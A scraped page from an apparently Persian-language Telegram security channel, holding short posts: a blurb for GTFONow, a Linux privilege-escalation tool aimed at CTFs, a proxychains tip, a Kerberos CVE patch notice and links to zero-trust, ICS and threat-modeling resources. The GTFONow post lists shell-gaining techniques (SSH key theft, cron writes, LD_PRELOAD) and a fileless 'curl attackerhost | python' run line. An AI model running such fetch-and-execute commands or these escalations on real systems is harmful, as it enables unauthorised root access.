Network Security Channel – Telegram
Network Security Channel
2.55K subscribers
5.33K photos
3.42K videos
5.56K files
4.44K links
شروع از سال 1395
Security Operation Center (SOC)
Bug Bounty
Vulnerability
Pentest
Hardening
Linux
Reasearch
Security Network
Security Researcher
DevSecOps
Blue Team
Red Team
Download Telegram
⭕️ به منظور خودکارسازی فرایند Privesc در سیستم های لینوکس و یونیکس، یک ابزار توسعه داده شده است که در دسته‌بندی Missconfig های setuid/setgid و sudo permission ها و ... تمرکز دارد. این ابزار عمدتاً برای مسابقات CTF طراحی شده است، اما در محیط های واقعی نیز قابل استفاده است.

Features

Automatically exploit misconfigured sudo permissions.
Automatically exploit misconfigured suid, sgid permissions.
Automatically exploit misconfigured capabilities.
Automatically convert arbitrary file read primitive into shell by stealing SSH keys.
Automatically convert arbitrary file write primitive into shell by dropping SSH keys.
Automatically convert arbitrary file write primitive into shell by writing to cron.
Automatically convert arbitrary file write primitive into shell using LD_PRELOAD.
Single file, easy to run fileless with curl http://attackerhost/gtfonow.py | python


#RedTeam #Privesc #bypass
@Engineer_Computer
🔸برنامه سبک ساده و سریع پروکسی ساکس برای ترمینال و برنامه‌های ترمینالی
🔹بدون نیاز به سرویس

♦️برای اتصال به نکوری:
sudo vi /etc/proxychains.conf

خط آخر پورت را به 2080 تغییر دهید.
socks4  127.0.0.1 2080


شیوه‌ی کار:

proxychains COMMAND


لینک‌ها:
👉🔗 Github
👉🔗 Arch Extra Repo
👉🔗 Wiki

#نکته #لینوکس #معرفی #آموزش
@Engineer_Computer
آسیب پذیری خطرناک در ویندوز
وصله کنید

@Engineer_Computer
a Windows Kerberos security feature bypass vulnerability that allows attackers to bypass authentication mechanisms and launch impersonation attacks. Attackers can exploit this flaw via a machine-in-the-middle (MitM) attack.

https://msrc.microsoft.com/update-guide/vulnerability/CVE-2024-20674
NIST.SP.800-207.pdf
944.2 KB
استاندارد NIST در مورد زیرو تراست
@Engineer_Computer
کانال یوتیوب برای آموزش رایگان امنیت سیستم های کنترل صنعتی

@Engineer_Computer
از افزونه های هوش مصنوعی و زیر نویس برای درک بیشتر کمک بگیرید

** یکی از افزونه های جالب ، خلاصه نویس ویدئو میباشد که کمک میکند در اولین نگاه ، کلیت ویدئو بدستتان بیاید

https://m.youtube.com/channel/UCKO03V8KB-kgWedXTFdaEHA?cbrd=1
دو نکته را در لینک زیر بیابید:

استفاده از سرویس به روزرسانی ویندوز برای تکمیل زنجیره حمله
نحوه و روش‌های تشخیص گروه‌های APT که انجام دهنده نفوذ هستند ( دلایل انتساب ویروس و حمله به APT خاص)

@Engineer_Computer

https://thehackernews.com/2022/01/north-korean-hackers-using-windows.html?m=1
معماران امنیت بخوانند

@Engineer_Computer
Threat Modeling is critical to achieving design goals for system security and data privacy.

This document provides a catalog of capabilities to help you cultivate value from your Threat Modeling practice.

https://www.threatmodelingmanifesto.org/capabilities/